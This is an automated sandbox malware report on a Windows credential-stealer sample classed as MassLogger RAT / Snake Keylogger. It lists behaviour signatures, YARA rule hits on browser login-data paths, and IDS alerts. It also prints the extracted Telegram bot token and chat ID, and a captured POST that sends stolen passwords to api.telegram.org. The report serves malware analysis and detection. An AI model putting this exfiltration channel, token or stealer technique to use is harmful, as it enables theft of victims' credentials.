Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VIAmJUhQ54.exe

Overview

General Information

Sample name:VIAmJUhQ54.exe
renamed because original name is a hash value
Original sample name:b118fff1b6ca5b742655af56712876b102e632c1623091ebd3cc9a8d1a639f84.exe
Analysis ID:1587606
MD5:1110092c1603912d573ac4539ef601a2
SHA1:c17d059f511e9695347a61fe40b917a6430c4c56
SHA256:b118fff1b6ca5b742655af56712876b102e632c1623091ebd3cc9a8d1a639f84
Tags:exeuser-adrian__luca
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • VIAmJUhQ54.exe (PID: 5924 cmdline: "C:\Users\user\Desktop\VIAmJUhQ54.exe" MD5: 1110092C1603912D573AC4539EF601A2)
    • RegSvcs.exe (PID: 7336 cmdline: "C:\Users\user\Desktop\VIAmJUhQ54.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7910311526:AAEn5doit3APLTHTBsAxIx_YHMTZbEuOtRo/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7910311526:AAEn5doit3APLTHTBsAxIx_YHMTZbEuOtRo", "Telegram Chatid": "6712961026"}
SourceRuleDescriptionAuthorStrings
00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000008.00000002.3712605161.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          00000008.00000002.3712605161.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 15 entries
            SourceRuleDescriptionAuthorStrings
            8.2.RegSvcs.exe.400000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
              8.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                8.2.RegSvcs.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  8.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0xf173:$a1: get_encryptedPassword
                  • 0xf49b:$a2: get_encryptedUsername
                  • 0xef0e:$a3: get_timePasswordChanged
                  • 0xf02f:$a4: get_passwordField
                  • 0xf189:$a5: set_encryptedPassword
                  • 0x10ae5:$a7: get_logins
                  • 0x10796:$a8: GetOutlookPasswords
                  • 0x10588:$a9: StartKeylogger
                  • 0x10a35:$a10: KeyLoggerEventArgs
                  • 0x105e5:$a11: KeyLoggerEventArgsEventHandler
                  8.2.RegSvcs.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                  • 0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data
                  • 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data
                  • 0x13931:$a4: \Orbitum\User Data\Default\Login Data
                  • 0x14729:$a5: \Kometa\User Data\Default\Login Data
                  Click to see the 10 entries
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T15:35:05.169737+010020577441Malware Command and Control Activity Detected192.168.2.1049749149.154.167.220443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T15:34:57.854468+010028032742Potentially Bad Traffic192.168.2.1049707193.122.130.080TCP
                  2025-01-10T15:35:04.229590+010028032742Potentially Bad Traffic192.168.2.1049707193.122.130.080TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T15:35:04.863572+010018100081Potentially Bad Traffic192.168.2.1049749149.154.167.220443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7910311526:AAEn5doit3APLTHTBsAxIx_YHMTZbEuOtRo", "Telegram Chatid": "6712961026"}
                  Source: RegSvcs.exe.7336.8.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7910311526:AAEn5doit3APLTHTBsAxIx_YHMTZbEuOtRo/sendMessage"}
                  Source: VIAmJUhQ54.exeReversingLabs: Detection: 79%
                  Source: VIAmJUhQ54.exeVirustotal: Detection: 69%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: VIAmJUhQ54.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: VIAmJUhQ54.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49708 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49749 version: TLS 1.2
                  Source: Binary string: wntdll.pdbUGP source: VIAmJUhQ54.exe, 00000001.00000003.1285323072.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, VIAmJUhQ54.exe, 00000001.00000003.1285847604.0000000003850000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: VIAmJUhQ54.exe, 00000001.00000003.1285323072.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, VIAmJUhQ54.exe, 00000001.00000003.1285847604.0000000003850000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00766CA9 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00766CA9
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_007660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,1_2_007660DD
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_007663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,1_2_007663F9
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0076EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0076EB60
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0076F56F FindFirstFileW,FindClose,1_2_0076F56F
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0076F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0076F5FA
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00771B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00771B2F
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00771C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00771C8A
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00771F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00771F94

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49749 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49749 -> 149.154.167.220:443
                  Source: unknownDNS query: name: api.telegram.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7910311526:AAEn5doit3APLTHTBsAxIx_YHMTZbEuOtRo/sendDocument?chat_id=6712961026&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd315a0f8efc48Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49707 -> 193.122.130.0:80
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49708 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00774EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,1_2_00774EB5
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: unknownHTTP traffic detected: POST /bot7910311526:AAEn5doit3APLTHTBsAxIx_YHMTZbEuOtRo/sendDocument?chat_id=6712961026&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd315a0f8efc48Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
                  Source: RegSvcs.exe, 00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: RegSvcs.exe, 00000008.00000002.3714455601.0000000002AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: RegSvcs.exe, 00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3714455601.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3714455601.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000008.00000002.3714455601.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: VIAmJUhQ54.exe, 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3712605161.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegSvcs.exe, 00000008.00000002.3714455601.0000000002B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: RegSvcs.exe, 00000008.00000002.3714455601.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 00000008.00000002.3715795244.0000000005F30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                  Source: RegSvcs.exe, 00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: RegSvcs.exe, 00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: VIAmJUhQ54.exe, 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3712605161.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                  Source: RegSvcs.exe, 00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7910311526:AAEn5doit3APLTHTBsAxIx_YHMTZbEuOtRo/sendDocument?chat_id=6712
                  Source: RegSvcs.exe, 00000008.00000002.3714455601.0000000002AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: VIAmJUhQ54.exe, 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3712605161.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3714455601.0000000002AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000008.00000002.3714455601.0000000002AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49749 version: TLS 1.2
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00776B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_00776B0C
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00776D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00776D07
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00776B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_00776B0C
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00762B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,1_2_00762B37
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0078F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0078F7FF

                  System Summary

                  barindex
                  Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.VIAmJUhQ54.exe.3690000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.VIAmJUhQ54.exe.3690000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.VIAmJUhQ54.exe.3690000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.VIAmJUhQ54.exe.3690000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000008.00000002.3712605161.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: Process Memory Space: VIAmJUhQ54.exe PID: 5924, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 7336, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: This is a third-party compiled AutoIt script.1_2_00723D19
                  Source: VIAmJUhQ54.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: VIAmJUhQ54.exe, 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_be7b8a64-b
                  Source: VIAmJUhQ54.exe, 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: uSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_078adbe8-d
                  Source: VIAmJUhQ54.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ab08b507-4
                  Source: VIAmJUhQ54.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_637e4ceb-7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00766606: CreateFileW,DeviceIoControl,CloseHandle,1_2_00766606
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0075AF64 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,1_2_0075AF64
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_007679D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_007679D3
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0074B0431_2_0074B043
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_007332001_2_00733200
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00733B701_2_00733B70
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0075410F1_2_0075410F
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_007402A41_2_007402A4
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0072E3E31_2_0072E3E3
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0075038E1_2_0075038E
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0075467F1_2_0075467F
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_007406D91_2_007406D9
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0078AACE1_2_0078AACE
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00754BEF1_2_00754BEF
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0074CCC11_2_0074CCC1
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0072AF501_2_0072AF50
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00726F071_2_00726F07
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0073B11F1_2_0073B11F
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_007831BC1_2_007831BC
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0074D1B91_2_0074D1B9
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0075724D1_2_0075724D
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0074123A1_2_0074123A
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_007293F01_2_007293F0
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_007613CA1_2_007613CA
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0073F5631_2_0073F563
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_007296C01_2_007296C0
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0076B6CC1_2_0076B6CC
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0078F7FF1_2_0078F7FF
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_007277B01_2_007277B0
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_007579C91_2_007579C9
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0073FA571_2_0073FA57
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00729B601_2_00729B60
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0073FE6F1_2_0073FE6F
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00749ED01_2_00749ED0
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00727FA31_2_00727FA3
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00F030101_2_00F03010
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00F073781_2_00F07378
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_011243288_2_01124328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_011227B98_2_011227B9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_011290488_2_01129048
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_011259688_2_01125968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01125F908_2_01125F90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01122DD18_2_01122DD1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0643C7B08_2_0643C7B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_064343408_2_06434340
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06435E188_2_06435E18
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: String function: 0073EC2F appears 68 times
